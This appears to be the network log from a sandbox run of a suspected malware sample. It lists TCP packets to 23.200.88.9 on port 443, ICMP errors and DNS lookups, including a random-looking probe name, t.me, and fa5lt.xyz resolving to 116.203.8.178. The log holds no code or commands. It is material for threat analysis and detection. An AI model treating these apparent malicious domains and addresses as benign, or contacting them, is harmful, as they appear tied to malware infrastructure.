                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.554722071 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.833570004 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.888339996 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.893501997 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.893589973 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.893649101 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.893685102 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.893790960 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.893846989 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.893899918 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.893934965 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.893935919 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.893969059 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.893997908 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.910208941 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.243992090 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.248517990 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.248769999 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.249278069 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.249289989 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.249301910 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.249411106 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.249420881 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.249433041 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.249444008 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.249762058 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.249773026 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.249783039 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.249792099 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.249921083 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.263256073 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.621463060 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.625710964 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.650552034 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.650806904 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.650866985 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.651139975 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.651149988 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.651206017 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.651223898 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.651233912 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.651473045 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.651483059 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.651494980 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.651602983 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.651612997 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:39.651623964 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:40.879550934 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:40.912591934 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:40.913252115 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.264604092 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.274679899 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.280491114 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.280742884 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.280951023 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.280965090 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.295804977 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.311444998 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.649988890 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.655783892 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.656307936 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.656333923 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.656351089 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.656368017 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.656488895 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.656507969 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.656522989 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.656541109 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.656557083 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:41.671849012 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.011248112 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.035258055 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.035568953 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.035618067 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.035990953 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.036056042 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.036072969 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.036112070 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.036194086 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.036211014 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.036226988 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.036242962 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.036334991 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.036391020 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.036407948 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.036518097 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.036531925 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.036550045 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.036562920 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.036864996 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.070792913 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.074805975 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.395379066 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.416651964 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.421705008 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.422116041 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.422333002 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.422350883 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.422368050 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.422383070 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.422398090 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.422414064 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.422430038 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.422791958 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.422919035 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.422934055 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.422952890 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.423760891 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.454205036 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.483230114 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.782857895 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.817190886 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.822381973 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.827857971 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.827877045 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.827991009 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.828825951 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.829150915 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.829166889 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.829185009 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.829200983 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.829216003 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.829231977 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.829246998 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.829253912 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.829293013 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.829309940 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.829332113 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:42.829348087 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:56.291630983 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:56.300380945 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:56.634085894 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:56.639257908 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:56.639266968 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:56.639273882 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:56.639645100 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:56.648511887 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:56.985755920 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:56.992460966 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:56.992470980 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:56.992609024 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:56.992854118 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:56.999871969 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:57.333328009 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:57.339617968 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:57.339628935 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:57.339637995 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:57.339880943 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:57.351026058 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:57.684514046 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:57.689366102 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:57.689378977 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:57.689408064 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:57.689805031 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:57.697319031 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:58.031028986 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:58.037081003 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:58.037094116 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:58.037177086 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:58.039489985 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:58.050137997 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:58.388906956 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:58.399494886 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:58.399523020 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:58.399755955 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:58.399967909 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:58.407372952 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:58.745038986 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:58.751481056 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:58.751494884 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:58.751740932 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:58.751754045 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:58.764697075 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:59.098237038 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:59.104332924 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:59.104362965 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:59.104435921 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:59.104716063 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:59.121634007 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:59.455920935 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:59.461955070 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:59.461966991 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:59.461977005 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:59.463095903 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:59.471843004 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:59.805723906 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:59.810760021 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:59.810797930 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:59.810885906 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:59.811296940 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:59.818670988 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.152729034 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.158432961 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.158588886 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.158683062 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.158745050 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.180511951 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.521847010 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.527386904 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.527724028 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.527941942 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.527951002 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.537645102 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.871239901 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.876209974 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.876270056 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.876394987 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.876573086 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:00.885824919 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:01.222268105 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:48:01.236387014 CET4436396823.200.88.9192.168.2.5
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Dec 27, 2024 14:46:57.960179090 CET | 192.168.2.5 | 1.1.1.1 | c1fe | (Port unreachable) | Destination Unreachable
Dec 27, 2024 14:47:17.965182066 CET | 192.168.2.5 | 1.1.1.1 | c299 | (Port unreachable) | Destination Unreachable
Dec 27, 2024 14:47:22.385757923 CET | 192.168.2.5 | 1.1.1.1 | c294 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 27, 2024 14:46:02.716891050 CET | 192.168.2.5 | 1.1.1.1 | 0x3f5e | Standard query (0) | BjQpTJiVkzRqS.BjQpTJiVkzRqS | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:46:39.552586079 CET | 192.168.2.5 | 1.1.1.1 | 0x788e | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:46:41.740348101 CET | 192.168.2.5 | 1.1.1.1 | 0x657e | Standard query (0) | fa5lt.xyz | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:46:57.730393887 CET | 192.168.2.5 | 1.1.1.1 | 0x39c7 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:46:57.730580091 CET | 192.168.2.5 | 1.1.1.1 | 0xdee9 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Dec 27, 2024 14:47:13.948277950 CET | 192.168.2.5 | 1.1.1.1 | 0x6d1e | Standard query (0) | ntp.msn.com | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:47:13.948580980 CET | 192.168.2.5 | 1.1.1.1 | 0x8196 | Standard query (0) | ntp.msn.com | 65 | IN (0x0001) | false
Dec 27, 2024 14:47:16.828819036 CET | 192.168.2.5 | 1.1.1.1 | 0xa23b | Standard query (0) | bzib.nelreports.net | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:47:16.829001904 CET | 192.168.2.5 | 1.1.1.1 | 0x4144 | Standard query (0) | bzib.nelreports.net | 65 | IN (0x0001) | false
Dec 27, 2024 14:47:17.576400995 CET | 192.168.2.5 | 1.1.1.1 | 0xe420 | Standard query (0) | clients2.googleusercontent.com | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:47:17.576569080 CET | 192.168.2.5 | 1.1.1.1 | 0x3a2 | Standard query (0) | clients2.googleusercontent.com | 65 | IN (0x0001) | false
Dec 27, 2024 14:47:18.785406113 CET | 192.168.2.5 | 1.1.1.1 | 0x9d5e | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:47:18.785676003 CET | 192.168.2.5 | 1.1.1.1 | 0xea21 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Dec 27, 2024 14:47:18.786103964 CET | 192.168.2.5 | 1.1.1.1 | 0xf6d5 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:47:18.786315918 CET | 192.168.2.5 | 1.1.1.1 | 0x9bee | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Dec 27, 2024 14:47:18.792994022 CET | 192.168.2.5 | 1.1.1.1 | 0x7fec | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:47:18.793138981 CET | 192.168.2.5 | 1.1.1.1 | 0x18e5 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Dec 27, 2024 14:47:21.958013058 CET | 192.168.2.5 | 1.1.1.1 | 0xa978 | Standard query (0) | sb.scorecardresearch.com | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:47:21.958115101 CET | 192.168.2.5 | 1.1.1.1 | 0x4a2f | Standard query (0) | sb.scorecardresearch.com | 65 | IN (0x0001) | false
Dec 27, 2024 14:47:21.960062981 CET | 192.168.2.5 | 1.1.1.1 | 0x13d1 | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:47:21.960278988 CET | 192.168.2.5 | 1.1.1.1 | 0x57c1 | Standard query (0) | assets.msn.com | 65 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 27, 2024 14:46:02.949616909 CET | 1.1.1.1 | 192.168.2.5 | 0x3f5e | Name error (3) | BjQpTJiVkzRqS.BjQpTJiVkzRqS | none | none | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:46:17.027544975 CET | 1.1.1.1 | 192.168.2.5 | 0x9c4b | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:46:17.027544975 CET | 1.1.1.1 | 192.168.2.5 | 0x9c4b | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:46:39.690644026 CET | 1.1.1.1 | 192.168.2.5 | 0x788e | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:46:42.046957970 CET | 1.1.1.1 | 192.168.2.5 | 0x657e | No error (0) | fa5lt.xyz | | 116.203.8.178 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:46:57.867925882 CET | 1.1.1.1 | 192.168.2.5 | 0x39c7 | No error (0) | www.google.com | | 142.250.181.68 | A (IP address) | IN (0x0001) | false
